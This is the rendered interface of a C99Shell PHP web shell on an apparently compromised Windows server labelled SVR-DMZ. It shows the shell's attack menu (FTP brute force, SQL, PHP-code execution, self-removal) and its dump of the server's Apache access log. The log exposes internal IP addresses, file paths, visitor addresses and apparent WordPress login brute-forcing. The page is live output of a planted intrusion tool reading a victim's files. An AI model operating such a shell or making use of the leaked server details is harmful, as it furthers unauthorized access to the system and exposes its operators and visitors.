!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.03.27.log (7.71 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [26/Mar/2023:23:58:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:00:00:16 -0500] "GET / HTTP/1.1" 200 4720
186.84.22.68 - - [27/Mar/2023:00:00:46 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 888406
186.84.22.68 - - [27/Mar/2023:00:00:47 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13502
172.22.2.4 - - [27/Mar/2023:00:00:49 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [27/Mar/2023:00:00:49 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [27/Mar/2023:00:00:49 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [27/Mar/2023:00:00:49 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [27/Mar/2023:00:00:49 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [27/Mar/2023:00:00:50 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [26/Mar/2023:23:59:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
172.22.2.4 - - [27/Mar/2023:00:01:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5180&usuario=&sector=&fecha=2014&resuelve= HTTP/1.1" 200 626
192.168.175.240 - - [27/Mar/2023:00:01:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:02:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:03:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:00:03:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
40.77.167.211 - - [27/Mar/2023:00:04:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/3481.pdf HTTP/1.1" 304 -
192.168.175.240 - - [27/Mar/2023:00:04:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:00:04:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:00:05:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:04:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
181.130.54.106 - - [27/Mar/2023:00:05:37 -0500] "GET /%C3%82%C2%BFquieres-aprender-sobre-jardines-verticales-esta-es-tu-oportunidad.html HTTP/1.1" 304 -
172.22.2.4 - - [27/Mar/2023:00:04:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:00:06:16 -0500] "GET / HTTP/1.1" 200 4720
194.93.37.82 - - [27/Mar/2023:00:06:41 -0500] "GET /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 200 1020
66.249.79.111 - - [27/Mar/2023:00:06:44 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2023:00:05:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [27/Mar/2023:00:07:16 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.210 - - [27/Mar/2023:00:07:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/1970.pdf HTTP/1.1" 304 -
152.61.192.232 - - [27/Mar/2023:00:07:54 -0500] "GET / HTTP/1.1" 200 319
186.29.171.62 - - [27/Mar/2023:00:08:10 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.29.171.62 - - [27/Mar/2023:00:08:13 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.29.171.62 - - [27/Mar/2023:00:08:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 7783
186.29.171.62 - - [27/Mar/2023:00:08:16 -0500] "POST /appsia/controlador HTTP/1.1" 200 6644
192.168.175.240 - - [27/Mar/2023:00:08:16 -0500] "GET / HTTP/1.1" 200 4720
186.29.171.62 - - [27/Mar/2023:00:08:21 -0500] "POST /appsia/controlador HTTP/1.1" 200 10605
201.245.192.253 - - [27/Mar/2023:00:08:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
172.22.2.4 - - [27/Mar/2023:00:08:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
192.168.175.240 - - [27/Mar/2023:00:09:16 -0500] "GET / HTTP/1.1" 200 4720
185.119.81.104 - - [27/Mar/2023:00:09:33 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [27/Mar/2023:00:09:35 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [27/Mar/2023:00:09:52 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.128 - - [27/Mar/2023:00:10:08 -0500] "-" 408 -
192.168.175.240 - - [27/Mar/2023:00:10:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:11:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:10:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:00:12:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:10:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
192.168.175.240 - - [27/Mar/2023:00:13:16 -0500] "GET / HTTP/1.1" 200 4720
190.26.155.157 - - [27/Mar/2023:00:13:22 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 304 -
185.119.81.106 - - [27/Mar/2023:00:13:31 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [27/Mar/2023:00:13:32 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [27/Mar/2023:00:13:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:00:14:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:00:14:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:00:15:16 -0500] "GET / HTTP/1.1" 200 4720
199.16.157.183 - - [27/Mar/2023:00:15:37 -0500] "GET /secretaria-de-ambiente-hace-seguimiento-a-la-calidad-del-aire-producto-de-incendio-a-las-afueras-de-bogota.html HTTP/1.1" 200 922
199.16.157.182 - - [27/Mar/2023:00:15:37 -0500] "GET /images/Incendio%20(1)%20(1).png HTTP/1.1" 200 189748
52.167.144.71 - - [27/Mar/2023:00:15:54 -0500] "GET /Publicaciones/2022EE177910.pdf HTTP/1.1" 404 228
168.119.252.242 - - [27/Mar/2023:00:16:04 -0500] "GET / HTTP/1.1" 200 319
168.119.252.242 - - [27/Mar/2023:00:16:05 -0500] "GET / HTTP/1.1" 200 4720
168.119.253.48 - - [27/Mar/2023:00:16:13 -0500] "GET / HTTP/1.1" 200 4720
168.119.253.48 - - [27/Mar/2023:00:16:14 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [27/Mar/2023:00:16:16 -0500] "GET / HTTP/1.1" 200 4720
207.46.13.213 - - [27/Mar/2023:00:16:53 -0500] "GET /Publicaciones/2022EE86515.pdf HTTP/1.1" 404 227
192.168.175.240 - - [27/Mar/2023:00:17:16 -0500] "GET / HTTP/1.1" 200 4720
186.84.90.190 - - [27/Mar/2023:00:17:27 -0500] "GET /forest/ HTTP/1.1" 200 12041
172.22.2.4 - - [27/Mar/2023:00:15:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.84.90.190 - - [27/Mar/2023:00:17:46 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
192.168.175.240 - - [27/Mar/2023:00:18:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:16:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [27/Mar/2023:00:18:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:00:19:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:00:19:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:00:20:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43178
201.245.192.253 - - [27/Mar/2023:00:20:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43035
192.168.175.240 - - [27/Mar/2023:00:20:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:21:06 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
192.168.175.240 - - [27/Mar/2023:00:21:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:22:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:22:25 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
31.13.127.18 - - [27/Mar/2023:00:22:57 -0500] "GET /images/Secretaria%20Urrutia%20evento%20h%C3%A1bitat%20Francia%2024%20de%20enero.jpeg HTTP/1.1" 404 1034
192.168.175.240 - - [27/Mar/2023:00:23:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:21:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:00:23:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
34.141.165.66 - - [27/Mar/2023:00:24:12 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [27/Mar/2023:00:22:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [27/Mar/2023:00:24:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:00:24:52 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:00:25:11 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
192.168.175.240 - - [27/Mar/2023:00:25:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:26:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:27:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:28:16 -0500] "GET / HTTP/1.1" 200 4720
152.61.128.50 - - [27/Mar/2023:00:28:17 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [27/Mar/2023:00:28:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
54.145.51.50 - - [27/Mar/2023:00:28:58 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
172.22.2.4 - - [27/Mar/2023:00:27:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:00:29:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:00:29:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:00:30:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43178
172.22.2.4 - - [27/Mar/2023:00:28:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
201.245.192.253 - - [27/Mar/2023:00:30:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43035
192.168.175.240 - - [27/Mar/2023:00:30:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:31:16 -0500] "GET / HTTP/1.1" 200 4720
190.84.108.224 - - [27/Mar/2023:00:32:00 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
190.84.108.224 - - [27/Mar/2023:00:32:04 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 580582
192.168.175.240 - - [27/Mar/2023:00:32:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:33:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:00:33:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
179.43.177.242 - - [27/Mar/2023:00:33:50 -0500] "GET / HTTP/1.1" 200 319
40.77.167.210 - - [27/Mar/2023:00:33:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5182.pdf HTTP/1.1" 200 331375
192.168.175.240 - - [27/Mar/2023:00:34:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:00:34:52 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:00:33:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.165 - - [27/Mar/2023:00:35:12 -0500] "GET /bla/resoluciones/autos%202021/2048.pdf HTTP/1.1" 200 362011
192.168.175.240 - - [27/Mar/2023:00:35:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:34:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [27/Mar/2023:00:36:16 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.111 - - [27/Mar/2023:00:36:43 -0500] "-" 408 -
192.168.175.240 - - [27/Mar/2023:00:37:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:38:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:00:38:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
114.119.150.186 - - [27/Mar/2023:00:38:27 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
114.119.150.186 - - [27/Mar/2023:00:38:28 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
114.119.150.186 - - [27/Mar/2023:00:38:27 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
114.119.150.186 - - [27/Mar/2023:00:38:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
114.119.150.186 - - [27/Mar/2023:00:38:27 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
114.119.150.186 - - [27/Mar/2023:00:38:28 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
114.119.150.186 - - [27/Mar/2023:00:38:29 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
114.119.150.186 - - [27/Mar/2023:00:38:29 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
114.119.150.186 - - [27/Mar/2023:00:38:29 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
114.119.150.186 - - [27/Mar/2023:00:38:30 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
114.119.150.186 - - [27/Mar/2023:00:38:29 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
114.119.150.186 - - [27/Mar/2023:00:38:28 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
114.119.150.186 - - [27/Mar/2023:00:38:30 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
114.119.150.186 - - [27/Mar/2023:00:38:30 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
114.119.150.186 - - [27/Mar/2023:00:38:28 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
114.119.150.186 - - [27/Mar/2023:00:38:30 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
114.119.150.186 - - [27/Mar/2023:00:38:30 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
114.119.150.186 - - [27/Mar/2023:00:38:30 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
114.119.150.186 - - [27/Mar/2023:00:38:31 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
114.119.150.186 - - [27/Mar/2023:00:38:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
114.119.150.186 - - [27/Mar/2023:00:38:30 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
114.119.150.186 - - [27/Mar/2023:00:38:31 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
114.119.150.186 - - [27/Mar/2023:00:38:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
114.119.150.186 - - [27/Mar/2023:00:38:31 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
114.119.150.186 - - [27/Mar/2023:00:38:31 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
114.119.150.186 - - [27/Mar/2023:00:38:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
114.119.150.186 - - [27/Mar/2023:00:38:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
114.119.150.186 - - [27/Mar/2023:00:38:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
114.119.150.186 - - [27/Mar/2023:00:38:34 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
157.55.39.217 - - [27/Mar/2023:00:38:56 -0500] "GET /BLA/resoluciones/AUTOS%202017/2739.pdf HTTP/1.1" 200 284417
172.22.2.4 - - [27/Mar/2023:00:39:07 -0500] "GET /BLA/boletinlegal/t4 HTTP/1.1" 404 1018
192.168.175.240 - - [27/Mar/2023:00:39:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:00:39:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:00:40:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43178
185.119.81.99 - - [27/Mar/2023:00:40:03 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.99 - - [27/Mar/2023:00:40:04 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [27/Mar/2023:00:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43035
159.242.234.204 - - [27/Mar/2023:00:40:07 -0500] "GET /rindex.php?action=add HTTP/1.1" 404 1022
192.168.175.240 - - [27/Mar/2023:00:40:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:39:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.165 - - [27/Mar/2023:00:41:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/3322.pdf HTTP/1.1" 304 -
192.168.175.240 - - [27/Mar/2023:00:41:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:40:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
52.167.144.167 - - [27/Mar/2023:00:42:05 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2023%2F HTTP/1.1" 200 10548
192.168.175.240 - - [27/Mar/2023:00:42:16 -0500] "GET / HTTP/1.1" 200 4720
162.55.175.143 - - [27/Mar/2023:00:42:21 -0500] "GET / HTTP/1.1" 200 319
162.55.175.143 - - [27/Mar/2023:00:42:23 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.210 - - [27/Mar/2023:00:42:44 -0500] "GET /forest/ HTTP/1.1" 200 12041
192.168.175.240 - - [27/Mar/2023:00:43:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:00:43:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
52.167.144.44 - - [27/Mar/2023:00:44:14 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [27/Mar/2023:00:44:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:00:44:52 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.104 - - [27/Mar/2023:00:45:11 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [27/Mar/2023:00:45:12 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
192.168.175.240 - - [27/Mar/2023:00:45:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:46:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:45:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:00:47:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:45:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55924
192.168.175.240 - - [27/Mar/2023:00:48:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:00:48:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:00:49:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:00:49:52 -0500] "HEAD / HTTP/1.1" 200 -
51.68.167.245 - - [27/Mar/2023:00:50:01 -0500] "-" 408 -
51.68.167.245 - - [27/Mar/2023:00:50:16 -0500] "-" 408 -
192.168.175.240 - - [27/Mar/2023:00:50:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:51:16 -0500] "GET / HTTP/1.1" 200 4720
152.61.192.232 - - [27/Mar/2023:00:51:22 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [27/Mar/2023:00:51:23 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [27/Mar/2023:00:51:24 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
192.168.175.240 - - [27/Mar/2023:00:52:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:00:50:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:00:53:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:00:53:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
172.22.2.4 - - [27/Mar/2023:00:51:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
207.46.13.213 - - [27/Mar/2023:00:53:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/1657.pdf HTTP/1.1" 304 -
192.168.175.240 - - [27/Mar/2023:00:54:16 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.211 - - [27/Mar/2023:00:54:25 -0500] "GET /Publicaciones/2022EE29051.pdf HTTP/1.1" 404 227
216.245.221.92 - - [27/Mar/2023:00:54:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:00:55:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:56:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:00:57:16 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.210 - - [27/Mar/2023:00:57:46 -0500] "GET /BLA/resoluciones/AUTOS%202017/2448.pdf HTTP/1.1" 200 2410191
192.168.175.240 - - [27/Mar/2023:00:58:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:00:58:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
172.22.2.4 - - [27/Mar/2023:00:56:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.79.115 - - [27/Mar/2023:00:58:51 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2023:00:57:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [27/Mar/2023:00:59:16 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.211 - - [27/Mar/2023:00:59:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/5017.pdf HTTP/1.1" 304 -
216.245.221.92 - - [27/Mar/2023:00:59:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:00:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:01:16 -0500] "GET / HTTP/1.1" 200 4720
35.204.37.140 - - [27/Mar/2023:01:02:13 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [27/Mar/2023:01:02:16 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.167 - - [27/Mar/2023:01:03:05 -0500] "GET /BLA/resoluciones/AUTOS%202022/5014.pdf HTTP/1.1" 200 574475
192.168.175.240 - - [27/Mar/2023:01:03:16 -0500] "GET / HTTP/1.1" 200 4720
